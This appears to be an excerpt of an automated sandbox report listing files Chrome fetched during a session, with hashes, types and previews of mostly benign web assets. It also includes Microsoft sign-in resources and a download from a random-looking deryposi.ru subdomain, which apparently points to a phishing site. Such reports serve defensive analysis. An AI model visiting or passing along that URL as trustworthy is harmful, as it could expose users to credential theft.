                                                                                                                                                                                                                Entropy (8bit):7.183477118222457
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:6:ek5ZO1el2qVEY5MOYEy0yNkCvRWjsHqYCy5x/zscjPxk75UDB7xW:7u162qVEY5MizCFvrz/ASJkCDBs
                                                                                                                                                                                                                MD5:F6D670E1D9AC69DA875B7BF0C8508425
                                                                                                                                                                                                                SHA1:CD35BA13BD4FCD05CFDCE6B5C0323F20EDAEA595
                                                                                                                                                                                                                SHA-256:1D6CE00E5E4526980AF9009CCCCC9271A21BB2706AF93E7E83BD96379F0E1092
                                                                                                                                                                                                                SHA-512:1EB54397A69F22AF03FCD2AFB918C61AB460399FD56F5619B2239FFBB113575FD636AE5E5A360F8BADD0C3DD61962B3EE0B443A658F6799C90E76C625A5DDD56
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                URL:https://app.getbeamer.com/images/beamerIso.png
                                                                                                                                                                                                                Preview:RIFF....WEBPVP8L".../#.... .H...e.).2.@.7.D...p.IR.p.;^]..... .... ..hwoP.="0..)|dY...i..T.y..7.n.|....../yv.R..F.~.a.x._....V...e...h.~!...P..X.v..Q|....?....z.......n.X!n>3{...=x&....n.\..O..d........b.X.....8.Hv3H.E(......Mj..W.'."H....W..T..=:y.!..8.KA.....X..........W....}+...]...dY@Y...G|:T.E.
                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                File Type:ASCII text, with very long lines (523)
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):929
                                                                                                                                                                                                                Entropy (8bit):4.986780010608439
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:24:2wkWnSs0GPI8WIXm40jK3T14IcLSGiaqABZr4VrOYzrOD1HBfLkdDdLpn:/Ss0anWw0jKfaPrErOvAdDxp
                                                                                                                                                                                                                MD5:14BBB452ACA6560934F86DE32F9F2695
                                                                                                                                                                                                                SHA1:02EE24229E8FA7E4B9C25A4B3F585DB46CDFFAFC
                                                                                                                                                                                                                SHA-256:5485EBF28789C7D34D8F76DC69ECD526B9460BF6DD2563D5A891197BE44D9E47
                                                                                                                                                                                                                SHA-512:974B9F31E4EA60A736A10F7105CCF722EBF45C490DC03330CCB932DBE86585049B4CFD18A1C61AE95C9B23E0C45F7BA565FC3A67C536351F39AE2D93447BD8F0
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                Preview:(function(b){b.fn.scrollLoad=function(g){var e,a={url:"",data:"",ScrollAfterHeight:90,onload:function(c,f){},start:function(c){},continueWhile:function(){return!0},getData:function(c){return""},onstop:function(){},onrequest:function(c){}},d;for(d in a)g[d]&&(a[d]=g[d]);return this.each(function(){this.scrolling=!1;this.scrollPrev=this.onscroll?this.onscroll:null;b(this).bind("scroll.scrollLoad",function(c){this.scrollPrev&&this.scrollPrev();!this.scrolling&&Math.round(b(this).scrollTop()/(b(this).prop("scrollHeight")-.b(this).prop("clientHeight"))*100)>a.ScrollAfterHeight&&(a.start.call(this,this),this.scrolling=!0,$this=b(this),e=b.ajax({url:a.url,traditional:!0,data:a.getData.call(this,this),type:"post",success:function(f){e=null;$this[0].scrolling=!1;a.onload.call($this[0],f,$this[0]);a.continueWhile.call($this[0],f)||($this.unbind("scroll.scrollLoad"),a.onstop.call())}}),a.onrequest.call(this,e))})})}})(jQuery);
                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                File Type:very short file (no magic)
                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                Size (bytes):1
                                                                                                                                                                                                                Entropy (8bit):0.0
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:3:U:U
                                                                                                                                                                                                                MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                                                                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                                                                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                                                                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                URL:https://7aopff8hhi2robm5gdfgzr8tt8v2krcgoy6uuy3lmhpmq5udo24.deryposi.ru/jlbzlotbmpcuyqcqkqspwLmyrpiRYUVCXKKIKYORDVCPXIACJHOKP
                                                                                                                                                                                                                Preview:1
                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):100238
                                                                                                                                                                                                                Entropy (8bit):5.480726332440175
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:1536:jRITeUbPhxXDfi4Gu68FsNG5wnYQKkIryjP9t/A2p+oh1Q1lGtOQfnWs+fPp9Zt:UeU7hxtGjosc2nYB297Iu//+t
                                                                                                                                                                                                                MD5:4D4F4C2AEFBF9B8FF7F9B53360E9408F
                                                                                                                                                                                                                SHA1:12DA728DFE56ECD3D98C27F32309B0F33A412B92
                                                                                                                                                                                                                SHA-256:EF81CAD1EC16D2674C980EEB7B95105520EAAFC06DD93F3931FE77D8B2102063
                                                                                                                                                                                                                SHA-512:B0C0CCA746CABC6AD9F9F3D0862CBDF065B5EB11D7C7E6C2756F1FB4DDC43D188F21144FE3ADD92EAF13737D6AEA395F108C25A5BE6E48D84EBC158624009611
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                Preview:/*. Highlight.js 10.1.2 (edd73d24). License: BSD-3-Clause. Copyright (c) 2006-2020, Ivan Sagalaev.*/.var hljs=function(){"use strict";function e(n){Object.freeze(n);var t="function"==typeof n;return Object.getOwnPropertyNames(n).forEach((function(r){!Object.hasOwnProperty.call(n,r)||null===n[r]||"object"!=typeof n[r]&&"function"!=typeof n[r]||t&&("caller"===r||"callee"===r||"arguments"===r)||Object.isFrozen(n[r])||e(n[r])})),n}class n{constructor(e){void 0===e.data&&(e.data={}),this.data=e.data}ignoreMatch(){this.ignore=!0}}function t(e){return e.replace(/&/g,"&amp;").replace(/</g,"&lt;").replace(/>/g,"&gt;").replace(/"/g,"&quot;").replace(/'/g,"&#x27;")}function r(e,...n){var t={};for(const n in e)t[n]=e[n];return n.forEach((function(e){for(const n in e)t[n]=e[n]})),t}function a(e){return e.nodeName.toLowerCase()}var i=Object.freeze({__proto__:null,escapeHTML:t,inherit:r,nodeStream:function(e){var n=[];return function e(t,r){for(var i=t.firstChild;i;i=i.nextSibling)3===i.nodeType?r
                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1592
                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                Size (bytes):621
                                                                                                                                                                                                                Entropy (8bit):7.673946009263606
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:12:Xp7fmqfW/e4YC2L0E5DZLB62y/+6lbPa1Gotq8mdd2Xmy2QLBwxD+QkCfBJ:Xp6qf2SCk3LBpy/rtPa1GKq8mOX5jLcD
                                                                                                                                                                                                                MD5:4761405717E938D7E7400BB15715DB1E
                                                                                                                                                                                                                SHA1:76FED7C229D353A27DB3257F5927C1EAF0AB8DE9
                                                                                                                                                                                                                SHA-256:F7ED91A1DAB5BB2802A7A3B3890DF4777588CCBE04903260FBA83E6E64C90DDF
                                                                                                                                                                                                                SHA-512:E8DAC6F81EB4EBA2722E9F34DAF9B99548E5C40CCA93791FBEDA3DEBD8D6E401975FC1A75986C0E7262AFA1B9D1475E1008A89B92C8A7BEC84D8A917F221B4A2
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                URL:https://aadcdn.msauth.net/shared/1.0/content/images/signin-options_3e3f6b73c3f310c31d2c4d131a8ab8c6.svg
                                                                                                                                                                                                                Preview:..........}UMo"1..+.....G; .8l...M..$.U.AW......UaX..`'.=......|..z3...Ms>..Y...QB..W..y..6.......?..........L.W=m....=..w.)...nw...a.z......#.y.j...m...P...#...6....6.u.u...OF.V..07b..\...s.f..U..N..B...>.d.-z..x.2..Lr.Rr)....JF.z.;Lh.....q.2.A....[.&".S..:......]........#k.U#57V..k5.tdM.j.9.FMQ2..H:.~op..H.......hQ.#...r[.T.$.@........j.xc.x0..I.B:#{iP1.e'..S4.:...mN.4)<W.A.).g.+..PZ&.$.#.6v.+.!...x*...}.._...d...#.Cb..(..^k..h!..7.dx.WHB......(.6g.7.Wwt.I<.......o.;.....Oi$}f.6.....:P..!<5.(.p.e.%et.)w8LA.l9r..n.....?.F.DrK...H....0F...{.,.......{E.."....*...x.@..?u......../....8...
                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):1350
                                                                                                                                                                                                                Entropy (8bit):5.051532597662484
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:24:2dG5AXxGvO7LfsoYAaASm/uSJyA1SKjJ2PaNOpCxGKV2x:cKAXQSfslAarouSA0SK12P8KCxGKV2x
                                                                                                                                                                                                                MD5:E00825A9E3D25E21F1DA9D01BDCDFB7B
                                                                                                                                                                                                                SHA1:2B4D87961D9E08FC5B48742FE2421A6F9510FA76
                                                                                                                                                                                                                SHA-256:2DD2C80457A627F9D494765FF045C15223510B2D2CEBD610E02BD1F732D34BCB
                                                                                                                                                                                                                SHA-512:331970F247A37FEE32FC3BBD25D8790C93B900EEDBA725EF3C8DC9AD665E380C2B311A66B64F771DEA7F5EB837AE57BB2DF36C88251D956977EFA6174E5EE1EA
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                Preview:<?xml version="1.0" encoding="utf-8"?>.. Generator: Adobe Illustrator 16.0.0, SVG Export Plug-In . SVG Version: 6.00 Build 0) -->..<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">..<svg version="1.1" id="Layer_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px"... width="30px" height="30px" viewBox="485 192.5 30 30" enable-background="new 485 192.5 30 30" xml:space="preserve">..<path d="M508.75,213.75c0,2.071-1.679,3.75-3.75,3.75s-3.75-1.679-3.75-3.75c0-0.507,0.101-0.989,0.282-1.43l-3.728-2.331...c-0.687,0.773-1.688,1.261-2.804,1.261c-2.071,0-3.75-1.679-3.75-3.75s1.679-3.75,3.75-3.75c1.116,0,2.117,0.487,2.804,1.26...l3.728-2.33c-0.182-0.441-0.282-0.924-0.282-1.43c0-2.071,1.679-3.75,3.75-3.75s3.75,1.679,3.75,3.75S507.071,205,505,205...c-1.115,0-2.117-0.487-2.804-1.26l-3.729,2.33c0.377,0.914,0.376,1.948,0,2.86l3.729,2.331c0.687-0.773,1.688-1.261,2.804-1.261...C507.071,210,508.75,211.679,50
                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                File Type:Unicode text, UTF-8 text, with very long lines (542)
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):161240
                                                                                                                                                                                                                Entropy (8bit):5.050423270451403
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:1536:uL7/SPhmhucqBl47xNPiA71hJF9+PAeEKFkaqUPho5n3F0xDcH2aKgq9ARQiy1:Qqp0ucqB+NPHv1WxCKgq9ARS
                                                                                                                                                                                                                MD5:686ECF4280631A4836CA064923366124
                                                                                                                                                                                                                SHA1:BF7C7A534C3E2DF3CE8A20C855A11E97ACEF796B
                                                                                                                                                                                                                SHA-256:79384E1E6712F557BD4AC52A364F3E4317B372F8310F18AE8AB101BF1E8937B8
                                                                                                                                                                                                                SHA-512:997DC40D66D0B7D47345DE0FC8A9FCD62A1797B86AAA2CFA2148FFBDD76EFC7D39719A077D3AD77891323D1B36B83553215A8E0778DD3DF682B04403DB99FE3D
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                Preview:(function(){function a(){}a.inits={};a.map={};a.replace_with_unicode=function(b){return a.replace_with_emoji(a.replace_colons_with_unicode(a.replace_emoticons_with_colons(b)))};a.replace_emoticons_with_colons=function(b){a.init_emoticons();return b.replace(a.rx_emoticons,function(c,d,h){return(h=a.data[a.map.emoticons[h]][3][0])?d+":"+h+":":c})};a.replace_colons_with_unicode=function(b){a.init_colons();return b.replace(a.rx_colons,function(c){var d=a.map.colons[c.substring(1,c.length-1)];return d?.a.data[d][0][0]:c})};a.replace_with_emoji=function(b){return b.replace(/&#x\w+;/,function(c){var d=c.match(/&#x(\w+);/)[1];return(d=a.data[d][0][0])?d:c})};a.init_emoticons=function(){if(!a.inits.emoticons){a.init_colons();a.inits.emoticons=1;var b=[];a.map.emoticons={};for(var c in a.emoticons_data){var d=c.replace(/&/g,"&amp;").replace(/</g,"&lt;").replace(/>/g,"&gt;");a.map.colons[a.emoticons_data[c]]&&(a.map.emoticons[d]=a.map.colons[a.emoticons_data[c]],b.push(a.escape_rx(d)))}a.rx_emoti
                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                File Type:Unicode text, UTF-8 text, with very long lines (542)
                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                Size (bytes):161240
                                                                                                                                                                                                                Entropy (8bit):5.050423270451403
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:1536:uL7/SPhmhucqBl47xNPiA71hJF9+PAeEKFkaqUPho5n3F0xDcH2aKgq9ARQiy1:Qqp0ucqB+NPHv1WxCKgq9ARS
                                                                                                                                                                                                                MD5:686ECF4280631A4836CA064923366124
                                                                                                                                                                                                                SHA1:BF7C7A534C3E2DF3CE8A20C855A11E97ACEF796B
                                                                                                                                                                                                                SHA-256:79384E1E6712F557BD4AC52A364F3E4317B372F8310F18AE8AB101BF1E8937B8
                                                                                                                                                                                                                SHA-512:997DC40D66D0B7D47345DE0FC8A9FCD62A1797B86AAA2CFA2148FFBDD76EFC7D39719A077D3AD77891323D1B36B83553215A8E0778DD3DF682B04403DB99FE3D
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                URL:https://app.getbeamer.com/js/emoji.js?v=4
                                                                                                                                                                                                                Preview:(function(){function a(){}a.inits={};a.map={};a.replace_with_unicode=function(b){return a.replace_with_emoji(a.replace_colons_with_unicode(a.replace_emoticons_with_colons(b)))};a.replace_emoticons_with_colons=function(b){a.init_emoticons();return b.replace(a.rx_emoticons,function(c,d,h){return(h=a.data[a.map.emoticons[h]][3][0])?d+":"+h+":":c})};a.replace_colons_with_unicode=function(b){a.init_colons();return b.replace(a.rx_colons,function(c){var d=a.map.colons[c.substring(1,c.length-1)];return d?.a.data[d][0][0]:c})};a.replace_with_emoji=function(b){return b.replace(/&#x\w+;/,function(c){var d=c.match(/&#x(\w+);/)[1];return(d=a.data[d][0][0])?d:c})};a.init_emoticons=function(){if(!a.inits.emoticons){a.init_colons();a.inits.emoticons=1;var b=[];a.map.emoticons={};for(var c in a.emoticons_data){var d=c.replace(/&/g,"&amp;").replace(/</g,"&lt;").replace(/>/g,"&gt;");a.map.colons[a.emoticons_data[c]]&&(a.map.emoticons[d]=a.map.colons[a.emoticons_data[c]],b.push(a.escape_rx(d)))}a.rx_emoti
                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                File Type:ASCII text, with very long lines (3403)
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):74138
                                                                                                                                                                                                                Entropy (8bit):5.43461756685079
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:768:agFXvKJ9dEcu+QaDNz+BUfuBI8lr9w98S1wTWpwxWS2Ftq0i4Pw51Flq0yKTx+X+:agFXiJuyqNr9U8rTx+NFDy7MR3xajRK2
                                                                                                                                                                                                                MD5:6EBC8A4021825C16FFDDEAA781F6610A
                                                                                                                                                                                                                SHA1:1E47170F21FAAD7DABE41E6B366A537D5AF80CCF
                                                                                                                                                                                                                SHA-256:13EA2D233956EA4686D171703A5B07FCA139E9A37C83A4B473AFF938821F4D66
                                                                                                                                                                                                                SHA-512:BEF1E2B8688CAECE8E11AB7EA5AA4590A2407C5A554FE5C0D2A9B6C686242A7A2486AEAB26304A249D60056AA3B181155305CE251D43EEDB189A3CE86C9386B1
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                Preview:var _BEAMER_URL="https://app.getbeamer.com/",_BEAMER_ABSOLUTE_URL="",_BEAMER_REACTIONS_KEY="_BEAMER_REACTIONS",_BEAMER_USER_REACTIONS_KEY="_BEAMER_USER_REACTIONS",_BEAMER_EMAIL_PROMPT_LAST_SHOWN="_BEAMER_EMAIL_PROMPT_LAST_SHOWN",_BEAMER_LAST_FEATURE_REQUESTS_ACCESS_DATE="_BEAMER_LAST_FEATURE_REQUESTS_ACCESS_DATE",_BEAMER_LAST_ROADMAP_ACCESS_DATE="_BEAMER_LAST_ROADMAP_ACCESS_DATE",newsURL,lastClickedElement,searchRequest,searchVisible=!1,_savingReaction=!1,_isSwitchingIframe=!1,_uploadingAttachments=.0,_uploadedPictureIds=[],_headerSize;if("undefined"===typeof _refUrl)var _refUrl;.var BeamerEmbed={init:function(a,b,c){$(function(){"undefined"!==typeof a&&a?(_headerSize=$(".header").outerHeight()+10,$(".news").css("padding-top",_headerSize)):(BeamerEmbed.loaded(),trackGoogleAnalytics("open"));"undefined"===typeof window._page&&(window._page=0);initTextarea();initAjax();initPosts();initMessageHandler();try{c&&(_BEAMER_ABSOLUTE_URL="https://app.getbeamer.com")}catch(d){}buildNewsUrl();$(do
                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                File Type:ASCII text, with very long lines (523)
                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                Size (bytes):929
                                                                                                                                                                                                                Entropy (8bit):4.986780010608439
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:24:2wkWnSs0GPI8WIXm40jK3T14IcLSGiaqABZr4VrOYzrOD1HBfLkdDdLpn:/Ss0anWw0jKfaPrErOvAdDxp
                                                                                                                                                                                                                MD5:14BBB452ACA6560934F86DE32F9F2695
                                                                                                                                                                                                                SHA1:02EE24229E8FA7E4B9C25A4B3F585DB46CDFFAFC
                                                                                                                                                                                                                SHA-256:5485EBF28789C7D34D8F76DC69ECD526B9460BF6DD2563D5A891197BE44D9E47
                                                                                                                                                                                                                SHA-512:974B9F31E4EA60A736A10F7105CCF722EBF45C490DC03330CCB932DBE86585049B4CFD18A1C61AE95C9B23E0C45F7BA565FC3A67C536351F39AE2D93447BD8F0
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                URL:https://app.getbeamer.com/js/scroll.jquery.js
                                                                                                                                                                                                                Preview:(function(b){b.fn.scrollLoad=function(g){var e,a={url:"",data:"",ScrollAfterHeight:90,onload:function(c,f){},start:function(c){},continueWhile:function(){return!0},getData:function(c){return""},onstop:function(){},onrequest:function(c){}},d;for(d in a)g[d]&&(a[d]=g[d]);return this.each(function(){this.scrolling=!1;this.scrollPrev=this.onscroll?this.onscroll:null;b(this).bind("scroll.scrollLoad",function(c){this.scrollPrev&&this.scrollPrev();!this.scrolling&&Math.round(b(this).scrollTop()/(b(this).prop("scrollHeight")-.b(this).prop("clientHeight"))*100)>a.ScrollAfterHeight&&(a.start.call(this,this),this.scrolling=!0,$this=b(this),e=b.ajax({url:a.url,traditional:!0,data:a.getData.call(this,this),type:"post",success:function(f){e=null;$this[0].scrolling=!1;a.onload.call($this[0],f,$this[0]);a.continueWhile.call($this[0],f)||($this.unbind("scroll.scrollLoad"),a.onstop.call())}}),a.onrequest.call(this,e))})})}})(jQuery);
                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                File Type:ASCII text, with very long lines (3643)
                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                Size (bytes):164237
                                                                                                                                                                                                                Entropy (8bit):5.2027742499547704
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:1536:D7LexQO7MswJy7oFytDxPPbuv/xCpj+ck7aaH8Gu6/CwKfUvQpphec2HAZW681p0:rexQO57LqCwBVcN
                                                                                                                                                                                                                MD5:7671DDFD46711DBDC0F6C9EA6170CFB1
                                                                                                                                                                                                                SHA1:71A5E1CB5B2E4234F8EE15B76FD4479CF5E88576
                                                                                                                                                                                                                SHA-256:9529021BA90E0BE37BF2050B4C53274A2ECAAD50F075574646F450F01F7A97C7
                                                                                                                                                                                                                SHA-512:669D2245C25C0BE170C792E6923CB6A7B7ECE70FA82815895333F85C7EC4EDBF3556EFB31D19377F70FFE5F0E34F230B3DCF804B7A22B169B7EF83582B967DA4
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                URL:https://app.getbeamer.com/styles/styles.css?v=3
                                                                                                                                                                                                                Preview:@charset "UTF-8";@font-face{font-family:'Lato';font-style:normal;font-weight:300;font-display:swap;src:url(https://app.getbeamer.com/fonts2/Lato-Normal-300a.woff2) format('woff2');unicode-range:U+0100-024F,U+0259,U+1E00-1EFF,U+2020,U+20A0-20AB,U+20AD-20CF,U+2113,U+2C60-2C7F,U+A720-A7FF}@font-face{font-family:'Lato';font-style:normal;font-weight:300;font-display:swap;src:url(https://app.getbeamer.com/fonts2/Lato-Normal-300b.woff2) format('woff2');unicode-range:U+0000-00FF,U+0131,U+0152-0153,U+02BB-02BC,U+02C6,U+02DA,U+02DC,U+2000-206F,U+2074,U+20AC,U+2122,U+2191,U+2193,U+2212,U+2215,U+FEFF,U+FFFD}@font-face{font-family:'Lato';font-style:normal;font-weight:400;font-display:swap;src:url(https://app.getbeamer.com/fonts2/Lato-Normal-400a.woff2) format('woff2');unicode-range:U+0100-024F,U+0259,U+1E00-1EFF,U+2020,U+20A0-20AB,U+20AD-20CF,U+2113,U+2C60-2C7F,U+A720-A7FF}@font-face{font-family:'Lato';font-style:normal;font-weight:400;font-display:swap;src:url(https://app.getbeamer.com/fonts2/Lato
                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                File Type:GIF image data, version 89a, 220 x 220
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):2565
                                                                                                                                                                                                                Entropy (8bit):7.5243980087503886
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:48:guvnLxIx3SJ3z8L8SA6+7fTL377fYohFESoQ4odAQIfcbPA/CXr3SclinseOe:dko8Mxf33P9hXZbIMCiir
                                                                                                                                                                                                                MD5:2CE134E8AB4F908AB3A7330FED1F968F
                                                                                                                                                                                                                SHA1:71E529DD4B2D5E58FD05BC903746CF64235574D6
                                                                                                                                                                                                                SHA-256:B191993D21EECC8946DD92D650A92F701BBBFABE0707A616FADDDB165D40E3E0
                                                                                                                                                                                                                SHA-512:5957DB7D4C6F5D812BC10BB3FA753B61358ECCBDA0B3A657E6451E26365C1D5830BDB606DD07CD49A5D25596A0135352DEEBD06145CB3DDEE068038F6B930A5B
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                Preview:GIF89a..............................!..NETSCAPE2.0.....!..XMP DataXMP<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c067 79.157747, 2015/03/30-23:40:42 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:b9279d04-4a3c-0d45-a975-6505e74e0106" xmpMM:DocumentID="xmp.did:72B6B0C32BA211E5982286552619F9CF" xmpMM:InstanceID="xmp.iid:72B6B0C22BA211E5982286552619F9CF" xmp:CreatorTool="Adobe Photoshop CC 2015 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:cadcdf94-8054-a447-a60c-3cf5b0654fab" stRef:documentID="adobe:docid:photoshop:105037e0-2ba1-11e5-8320-8a4a5e4e22e2"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....................................................
                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 15755
                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                Size (bytes):5525
                                                                                                                                                                                                                Entropy (8bit):7.961202222662501
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:96:dySl6/e7OAQD3cS66g8cxO4qXgy66F0+fgENU28TjN3KY6meSsj0ktMvB4YJix2I:dNl6/zFDW6dlXV665ReB67j0sEBWxl
                                                                                                                                                                                                                MD5:28CE5BF8BACB96D1C2CFA0092145C6EE
                                                                                                                                                                                                                SHA1:303A4629C4467AF2C551EC9E6353464C8C25827D
                                                                                                                                                                                                                SHA-256:6B89EEC14865DB53FE20FB3C70B0853362E21669DACE19C06172F673B2EDC5CD
                                                                                                                                                                                                                SHA-512:6A10794F105EF5C6F7F7DC2C89152A8342E6D9D8D9490783863ED2737FFD5982E916F72E0A9ECB944AB9815FA70BD20C7256A91E2A62D971F80C23822B809A02
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                URL:https://aadcdn.msauth.net/shared/1.0/content/js/asyncchunk/convergedlogin_pfetchsessionsprogress_1cd84c14a6b01fcd8515.js
                                                                                                                                                                                                                Preview:...........[}w.F....Bh..i3.M.t.rU.....]..M...@.(..........@..N..I-k..;w.....U.F..v....N....]....MC......U.]o>..mJ.w..~.5<......Z.h~8..8J..m......0.&Z:.Z.D_. .Z.....<.f..t..].I:..........b. ...}.ja......'..x......m6..c...$..........b|s......O.a..cE..u.2.*.6jG!.A.....P..?q@?"..).Mk.0.[."V..M..4...4.~}.?.i..D.}h|..$x.Ajm.S..H..-.x.If..]..1.D0.F......pq.(.|...y\...5....y2.q.Fq...[.|..n.b.i_D......xuR......I.TS.4..}|<...o....MG.+@.......\.?."...+[...A..&...{]......u..+p?......|...j....7...=H..cwp.38.;%c.....O..............p...X.g!....r...d..5.%x.....;...j6p...p......c.Nd.:...&.*....%.. tR.d.@.. ...1..6....i....:...s=..V...iN..1../tH..p<..Mo.......`&.7uA;..(lC.......4...?..0..[S@...D..|....=.wh2...<.. ...)..F...!. .C...k...S.pPt......s..K.V...w......7....Zn.d..t]l.........5=.(..#.....l._.Ip......-O.6.,......q4....!XS`6k..k.....9k....{~*.....X....q......l.>x..={j.n..W......e..Q..I/..;a..MS>.!5v.d.B+.o.....q...j.q..Z..=..@g.1q..,yBV91m.j>..4.o...
                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                Size (bytes):62770
                                                                                                                                                                                                                Entropy (8bit):7.992863840113149
                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                SSDEEP:1536:0LC+CUlOBKXQks58clMuoXOtpWIK5OSrPIKhzKz5Yp:cN1KT9vlMuQNiuIKNKGp
                                                                                                                                                                                                                MD5:A35C62D7EAA2E0EA8834EF3625A0029B
                                                                                                                                                                                                                SHA1:068EB6330E9DD2088A4C5530380B457BF45FE48A
                                                                                                                                                                                                                SHA-256:C19830CA5330C2F58B0C5F1D76AD53FD5EFE4AE182DFE824A0B015E4C23F16C3
                                                                                                                                                                                                                SHA-512:DF1EAADC3D6EE1E62FB8ED54C45D45BA9011D46AA99B27FD241DF3B18612AFAB0F6581419754992195B6E9E4D889866D7ADF26FEE26862D856C2E0829F8AB0EA
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                URL:https://app.getbeamer.com/pictures?id=458662-77-9a--_ve-_vVfvv70WFe-_vSrvv703Eu-_vX0c77-9TgVq77-977-9Xe-_ve-_vUzvv73vv73vv71F77-9&v=4
